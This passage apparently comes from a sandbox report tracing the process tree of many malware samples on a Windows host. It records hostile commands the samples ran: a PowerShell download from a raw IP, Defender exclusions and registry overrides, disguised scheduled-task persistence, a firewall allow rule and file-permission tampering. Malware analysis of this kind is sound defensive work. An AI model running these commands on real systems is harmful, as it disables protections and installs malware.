      PID:11032
    - - C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /im "httpdoggie-services.comdl.phppub=mixtenid=Admin&mn=HRCPJXUV&os=6.2 build 9200.exe" /f
        5⤵
        Kills process with taskkill
        
        PID:4272
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 5556 -s 1872
      4⤵
      Program crash
      PID:11196
- - C:\Users\Admin\AppData\Local\Temp\httpmiles-and-more-kreditkartes.comoorigginte.exe.exe
    "C:\Users\Admin\AppData\Local\Temp\httpmiles-and-more-kreditkartes.comoorigginte.exe.exe"
    3⤵
    PID:6760
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c taskkill /im "httpmiles-and-more-kreditkartes.comoorigginte.exe.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\httpmiles-and-more-kreditkartes.comoorigginte.exe.exe" & exit
      4⤵
      PID:8632
    - - C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /im "httpmiles-and-more-kreditkartes.comoorigginte.exe.exe" /f
        5⤵
        Kills process with taskkill
        
        PID:9484
- - C:\Users\Admin\AppData\Local\Temp\httpmiles-and-more-kreditkartes.comdl.phppub=mixtenid=Admin&mn=HRCPJXUV&os=6.2 build 9200.exe
    "C:\Users\Admin\AppData\Local\Temp\httpmiles-and-more-kreditkartes.comdl.phppub=mixtenid=Admin&mn=HRCPJXUV&os=6.2 build 9200.exe"
    3⤵
    PID:7508
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 7508 -s 832
      4⤵
      Program crash
      PID:7064
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 7508 -s 888
      4⤵
      Program crash
      PID:6264
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 7508 -s 868
      4⤵
      Program crash
      PID:6772
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 7508 -s 1104
      4⤵
      Program crash
      PID:3868
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 7508 -s 1116
      4⤵
      Program crash
      PID:1384
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 7508 -s 1696
      4⤵
      Program crash
      PID:484
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c taskkill /im "httpmiles-and-more-kreditkartes.comdl.phppub=mixtenid=Admin&mn=HRCPJXUV&os=6.2 build 9200.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\httpmiles-and-more-kreditkartes.comdl.phppub=mixtenid=Admin&mn=HRCPJXUV&os=6.2 build 9200.exe" & exit
      4⤵
      PID:2280
    - - C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /im "httpmiles-and-more-kreditkartes.comdl.phppub=mixtenid=Admin&mn=HRCPJXUV&os=6.2 build 9200.exe" /f
        5⤵
        Kills process with taskkill
        
        PID:2856
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 7508 -s 548
      4⤵
      Program crash
      PID:10376
- - C:\Users\Admin\AppData\Local\Temp\httpjobs-servers.comdl.phppub=mixeightid=Admin&mn=HRCPJXUV&os=6.2 build 9200.exe
    "C:\Users\Admin\AppData\Local\Temp\httpjobs-servers.comdl.phppub=mixeightid=Admin&mn=HRCPJXUV&os=6.2 build 9200.exe"
    3⤵
    PID:7828
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 7828 -s 1164
      4⤵
      Program crash
      PID:6440
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 7828 -s 1196
      4⤵
      Program crash
      PID:6556
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 7828 -s 1624
      4⤵
      Program crash
      PID:7936
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c taskkill /im "httpjobs-servers.comdl.phppub=mixeightid=Admin&mn=HRCPJXUV&os=6.2 build 9200.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\httpjobs-servers.comdl.phppub=mixeightid=Admin&mn=HRCPJXUV&os=6.2 build 9200.exe" & exit
      4⤵
      PID:10280
    - - C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /im "httpjobs-servers.comdl.phppub=mixeightid=Admin&mn=HRCPJXUV&os=6.2 build 9200.exe" /f
        5⤵
        Kills process with taskkill
        
        PID:2648
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 7828 -s 1724
      4⤵
      Program crash
      PID:10508
- - C:\Users\Admin\AppData\Local\Temp\http49.13.194.118winlogon.exe.exe
    "C:\Users\Admin\AppData\Local\Temp\http49.13.194.118winlogon.exe.exe"
    3⤵
    PID:7832
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command " WindowStyle -Hidden Add-MpPreference -ExclusionPath 'C:\' -Force [Net.ServicePointManager]::SecurityProtocol = 'Tls, Tls11, Tls12, Ssl3' $DownloadUrl = 'http://49.13.194.118/ADServices.exe' $WebResponse = Invoke-WebRequest -Uri $DownloadUrl -Method Head Write-Output 'Downloading $DownloadUrl' Start-BitsTransfer -Source $WebResponse.BaseResponse.ResponseUri.AbsoluteUri.Replace('%20', ' ') -Destination 'C:\\Windows\\Temp\\'"
      4⤵
      Command and Scripting Interpreter: PowerShell
      PID:1208
    - - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        5⤵
        Suspicious use of SetWindowsHookEx
        
        PID:1576
- - C:\Users\Admin\AppData\Local\Temp\http5.42.66.47filessetup.exe.exe
    "C:\Users\Admin\AppData\Local\Temp\http5.42.66.47filessetup.exe.exe"
    3⤵
    PID:7892
  - - C:\Users\Admin\AppData\Local\Temp\7zS174D.tmp\Install.exe
      .\Install.exe
      4⤵
      PID:7664
    - - C:\Users\Admin\AppData\Local\Temp\7zS29AC.tmp\Install.exe
        
        .\Install.exe /yqjCHdidlQ "385118" /S
        5⤵
        
        PID:7940
      - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
        6⤵
        
        PID:8924
        
        C:\Windows\SysWOW64\forfiles.exe
        
        forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
        7⤵
        
        PID:7952
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
        8⤵
        
        PID:6404
        
        \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
        9⤵
        
        PID:8360
        
        C:\Windows\SysWOW64\forfiles.exe
        
        forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
        7⤵
        
        PID:9044
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
        8⤵
        
        PID:6852
        
        \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
        9⤵
        
        PID:8784
        
        C:\Windows\SysWOW64\forfiles.exe
        
        forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
        7⤵
        
        PID:6960
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
        8⤵
        
        PID:2980
        
        \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
        9⤵
        
        PID:1188
        
        C:\Windows\SysWOW64\forfiles.exe
        
        forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
        7⤵
        
        PID:8352
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
        8⤵
        
        PID:7104
        
        \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
        9⤵
        
        PID:6960
        
        C:\Windows\SysWOW64\forfiles.exe
        
        forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
        7⤵
        
        PID:4624
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
        8⤵
        
        PID:6960
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell start-process -WindowStyle Hidden gpupdate.exe /force
        9⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:8592
        
        C:\Windows\SysWOW64\gpupdate.exe
        
        "C:\Windows\system32\gpupdate.exe" /force
        10⤵
        
        PID:9772
      - C:\Windows\SysWOW64\forfiles.exe
        
        "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"
        6⤵
        
        PID:2760
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        7⤵
        
        PID:6824
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
        7⤵
        
        PID:8208
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
        8⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:7328
        
        C:\Windows\SysWOW64\Wbem\WMIC.exe
        
        "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
        9⤵
        
        PID:940
      - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /CREATE /TN "bjPRdWxZxSSObMFEvg" /SC once /ST 12:28:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\7zS29AC.tmp\Install.exe\" PX /BgKdidTVKL 385118 /S" /V1 /F
        6⤵
        Creates scheduled task(s)
        
        PID:9204
      - C:\Windows\SysWOW64\forfiles.exe
        
        "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m waitfor.exe /c "cmd /C schtasks /run /I /tn bjPRdWxZxSSObMFEvg"
        6⤵
        
        PID:8772
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C schtasks /run /I /tn bjPRdWxZxSSObMFEvg
        7⤵
        
        PID:3824
        
        \??\c:\windows\SysWOW64\schtasks.exe
        
        schtasks /run /I /tn bjPRdWxZxSSObMFEvg
        8⤵
        
        PID:8284
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 7940 -s 1020
        6⤵
        Program crash
        
        PID:20232
- - C:\Users\Admin\AppData\Local\Temp\http185.172.128.195.exe.exe
    "C:\Users\Admin\AppData\Local\Temp\http185.172.128.195.exe.exe"
    3⤵
    PID:5136
- - C:\Users\Admin\AppData\Local\Temp\http185.172.128.19Newoff.exe.exe
    "C:\Users\Admin\AppData\Local\Temp\http185.172.128.19Newoff.exe.exe"
    3⤵
    PID:7452
  - - C:\Windows\SysWOW64\schtasks.exe
      "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN http185.172.128.19Newoff.exe.exe /TR "C:\Users\Admin\AppData\Local\Temp\http185.172.128.19Newoff.exe.exe" /F
      4⤵
      Creates scheduled task(s)
      PID:6632
    - - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        5⤵
        Suspicious use of SetWindowsHookEx
        
        PID:6860
- - C:\Users\Admin\AppData\Local\Temp\httpscovid19help.topGOtm.exe.exe
    "C:\Users\Admin\AppData\Local\Temp\httpscovid19help.topGOtm.exe.exe"
    3⤵
    PID:964
- - C:\Users\Admin\AppData\Local\Temp\httpwww.escortcat.comsouthdownloaddrivergps_1688.exe.exe
    "C:\Users\Admin\AppData\Local\Temp\httpwww.escortcat.comsouthdownloaddrivergps_1688.exe.exe"
    3⤵
    PID:680
- - C:\Users\Admin\AppData\Local\Temp\http221.143.49.222A.I_1003H.exe.exe
    "C:\Users\Admin\AppData\Local\Temp\http221.143.49.222A.I_1003H.exe.exe"
    3⤵
    PID:14216
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX1\A.I.exe
      "C:\Users\Admin\AppData\Local\Temp\RarSFX1\A.I.exe"
      4⤵
      PID:11964
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\A.I_Run.cmd" "
        5⤵
        
        PID:19432
      - C:\Windows\SysWOW64\sc.exe
        
        sc stop PcaSvc
        6⤵
        Launches sc.exe
        
        PID:17120
      - C:\Windows\SysWOW64\takeown.exe
        
        takeown /f C:\Windows\Sysnative\sfc.exe
        6⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:21048
      - C:\Windows\SysWOW64\icacls.exe
        
        icacls C:\Windows\Sysnative\sfc.exe /t /deny everyone:f
        6⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:21164
- - C:\Users\Admin\AppData\Local\Temp\http104.248.53.100payload.exe.exe
    "C:\Users\Admin\AppData\Local\Temp\http104.248.53.100payload.exe.exe"
    3⤵
    PID:24076
  - - C:\Users\Admin\AppData\Roaming\Z0BAZwxx\ertrqvg.exe
      C:\Users\Admin\AppData\Roaming\Z0BAZwxx\ertrqvg.exe
      4⤵
      PID:17932
    - - C:\Windows\SysWOW64\cmd.exe
        
        /a /c netsh advfirewall firewall add rule name="Z0BAZwxx" dir=in action=allow program="C:\Users\Admin\AppData\Roaming\Z0BAZwxx\ertrqvg.exe"
        5⤵
        
        PID:25304
      - C:\Windows\SysWOW64\netsh.exe
        
        netsh advfirewall firewall add rule name="Z0BAZwxx" dir=in action=allow program="C:\Users\Admin\AppData\Roaming\Z0BAZwxx\ertrqvg.exe"
        6⤵
        Modifies Windows Firewall
        
        PID:25428
    - - C:\Users\Admin\AppData\Roaming\Z0BAZwxx\ertrqvg.exe
        
        "C:\Users\Admin\AppData\Roaming\Z0BAZwxx\ertrqvg.exe"
        5⤵
        
        PID:18664
  - - C:\Windows\SysWOW64\cmd.exe
      /a /c ping 127.0.0.1 -n 3&del "C:\Users\Admin\AppData\Local\Temp\HTTP10~3.EXE"
      4⤵
      PID:24948
    - - C:\Windows\SysWOW64\PING.EXE
        
        ping 127.0.0.1 -n 3
        5⤵
        Runs ping.exe
        
        PID:25112
- - C:\Users\Admin\AppData\Local\Temp\http115.78.235.258080ToolAPSVR.exe.exe
    "C:\Users\Admin\AppData\Local\Temp\http115.78.235.258080ToolAPSVR.exe.exe"
    3⤵
    PID:26032
  - - C:\Windows\SysWOW64\msiexec.exe
      "C:\Windows\System32\msiexec.exe" /i "C:\Users\Admin\AppData\Local\Temp\setup.msi"
      4⤵
      PID:26268
- - C:\Users\Admin\AppData\Local\Temp\httpwww.escortcat.comsouthdownloadsoftware858UpdateTool_858.exe.exe
    "C:\Users\Admin\AppData\Local\Temp\httpwww.escortcat.comsouthdownloadsoftware858UpdateTool_858.exe.exe"
    3⤵
    PID:38144
- - C:\Users\Admin\AppData\Local\Temp\httpsraw.githubusercontent.comahmed45shFlutter-Moviemastercrypted_c360a5b7.exe.exe
    "C:\Users\Admin\AppData\Local\Temp\httpsraw.githubusercontent.comahmed45shFlutter-Moviemastercrypted_c360a5b7.exe.exe"
    3⤵
    PID:38620
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
      4⤵
      PID:38400
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
      4⤵
      PID:38436
- - C:\Users\Admin\AppData\Local\Temp\httpsraw.githubusercontent.comahmed45shapple-replica-starter-filesmasterapple-replicaZinTask.exe.exe
    "C:\Users\Admin\AppData\Local\Temp\httpsraw.githubusercontent.comahmed45shapple-replica-starter-filesmasterapple-replicaZinTask.exe.exe"
    3⤵
    PID:38768
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 38768 -s 244
      4⤵
      Program crash
      PID:38256
- - C:\Users\Admin\AppData\Local\Temp\httpsgithub.comSnusikOdlootarawmainlordga.exe.exe
    "C:\Users\Admin\AppData\Local\Temp\httpsgithub.comSnusikOdlootarawmainlordga.exe.exe"
    3⤵
    PID:43868
- - C:\Users\Admin\AppData\Local\Temp\http103.219.124.16xx64.exe.exe
    "C:\Users\Admin\AppData\Local\Temp\http103.219.124.16xx64.exe.exe"
    3⤵
    PID:45140
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c color 0a
      4⤵
      PID:45260
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c chcp 936
      4⤵
      PID:45376
    - - C:\Windows\system32\chcp.com
        
        chcp 936
        5⤵
        
        PID:45484
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#llzqlmcx#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Windows Upgrade Manager' /tr '''C:\Users\Admin\Windows Upgrade\wupgrdsv.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\Windows Upgrade\wupgrdsv.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Windows Upgrade Manager' -RunLevel 'Highest' -Force; }
  2⤵
  PID:5504
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:4900
- C:\Windows\System32\schtasks.exe
  C:\Windows\System32\schtasks.exe /run /tn "Windows Upgrade Manager"
  2⤵
  PID:2276
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:2336
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#llzqlmcx#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Windows Upgrade Manager' /tr '''C:\Users\Admin\Windows Upgrade\wupgrdsv.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\Windows Upgrade\wupgrdsv.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Windows Upgrade Manager' -RunLevel 'Highest' -Force; }
  2⤵
  PID:5688
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:1060

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
1⤵
PID:3464

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo
1⤵
PID:3500

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:3848

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
- Suspicious use of UnmapMainImage
PID:3916

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:3944

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k UdkSvcGroup -s UdkUserSvc
1⤵
PID:3952

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{973D20D7-562D-44B9-B70B-5A0F49CCDF3F}
1⤵
PID:4304

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k osprivacy -p -s camsvc
1⤵
PID:4420

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
1⤵
PID:4408

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
1⤵
PID:864

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
1⤵
- Enumerates connected drives
- Writes to the Master Boot Record (MBR)
PID:1948

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
1⤵
PID:5116

C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
1⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:3472

C:\Windows\system32\SppExtComObj.exe
C:\Windows\system32\SppExtComObj.exe -Embedding
1⤵
PID:2300

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
1⤵
PID:2640

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
- Drops file in System32 directory
PID:4020

C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
1⤵
- Checks SCSI registry key(s)
- Checks processor information in registry
PID:1368

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s PcaSvc
1⤵
PID:2140

C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
1⤵
PID:5052

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k WerSvcGroup
1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
PID:3016
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 1616 -ip 1616
  2⤵
  PID:5232
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 2700 -ip 2700
  2⤵
  PID:2096
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -pss -s 480 -p 3004 -ip 3004
  2⤵
  PID:6052
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 5636 -ip 5636
  2⤵
  PID:5956
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -pss -s 380 -p 684 -ip 684
  2⤵
  PID:1120
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 6104 -ip 6104
  2⤵
  PID:3596
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 7636 -ip 7636
  2⤵
  PID:8180
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 4908 -ip 4908
  2⤵
  PID:692
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 6724 -ip 6724
  2⤵
  PID:6564
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 7848 -ip 7848
  2⤵
  PID:7884
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 7060 -ip 7060
  2⤵
  PID:1028
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -pss -s 400 -p 8048 -ip 8048
  2⤵
  PID:6160
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -pss -s 492 -p 7636 -ip 7636
  2⤵
  PID:6792
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -pss -s 596 -p 5556 -ip 5556
  2⤵
  PID:5608
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -pss -s 628 -p 7636 -ip 7636
  2⤵
  PID:7704
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -pss -s 612 -p 6724 -ip 6724
  2⤵
  PID:7188
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -pss -s 624 -p 7060 -ip 7060
  2⤵
  PID:8024
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 7508 -ip 7508
  2⤵
  PID:5368
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -pss -s 648 -p 7848 -ip 7848
  2⤵
  PID:6248
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -pss -s 664 -p 4908 -ip 4908
  2⤵
  PID:8148
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 6724 -ip 6724
  2⤵
  PID:800
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -pss -s 696 -p 7828 -ip 7828
  2⤵
  PID:2340
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -pss -s 592 -p 6724 -ip 6724
  2⤵
  PID:6604
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 8048 -ip 8048
  2⤵
  PID:6652
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 7848 -ip 7848
  2⤵
  PID:4612
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -pss -s 708 -p 7508 -ip 7508
  2⤵
  PID:6336
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -pss -s 716 -p 6724 -ip 6724
  2⤵
  PID:5456
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -pss -s 380 -p 7508 -ip 7508
  2⤵
  PID:6412
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -pss -s 708 -p 7848 -ip 7848
  2⤵
  PID:7132
- C:\Windows\SysWOW64\WerFault.exe
